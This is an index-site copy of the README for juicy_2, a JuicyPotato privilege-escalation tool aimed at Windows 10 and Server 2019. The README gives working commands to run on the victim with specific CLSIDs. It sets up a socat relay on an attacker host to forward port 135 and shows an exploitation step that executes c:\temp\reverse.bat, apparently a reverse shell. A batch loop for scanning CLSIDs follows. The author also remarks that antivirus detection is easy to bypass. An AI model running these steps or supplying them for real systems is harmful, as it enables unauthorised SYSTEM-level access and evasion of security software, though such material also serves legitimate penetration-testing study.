Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/decoder-it/juicy_2

juicypotato for win10 > 1803 & win server 2019
https://github.com/decoder-it/juicy_2

Last synced: 3 months ago
JSON representation

juicypotato for win10 > 1803 & win server 2019

Awesome Lists containing this project

README 

        
# juicy_2

JuicyPotato for Win10 > 1803 & Win Server 2019


Please read my blog post first: https://decoder.cloud/2020/05/30/the-impersonation-game/ 




Disclaimer:


This is just a quick & dirty modification of our JuicyPotato in order to test valid CLSID's and to impersonate them (YOU NEED IMPERSONATION PRIVILEGES) for newer Windows 10 and Windows Server 2019 platforms.


(I know, this version is catched by Defender and other AV's, but with some modifications in code it's easy to bypass)



Mandatory requisite is to have the possibility to redirect traffic for port 135 on a forwarder machine under you control.


Feel free to improve the code, I was too lazy for this kind of stuff. 




For testing CLSID:


juicy_2 -z -x [ip] of socat listener  -l [fake oxid resolver port] -n [local RPC server port] -c [CLSID to test]


Example:


  on victim:


  juicy_2 -z -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}


  on attacker (192.168.1.1): 


  socat -v  TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995 




  For exploitation:


  on victim:


  juicy_2 -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} -t * -p c:\temp\reverse.bat


  on attacker (192.168.1.1): 


  socat -v  TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995


  

Hunting for juicy CLSID's with a stupid batch:


@echo off


FOR /F %%i IN (clsid.list) DO (


   .\juicy_2 -z -x 192.168.1.1 -n 9998 -l 9995 -c %%i >> .\out.txt


   timeout /t 2


 )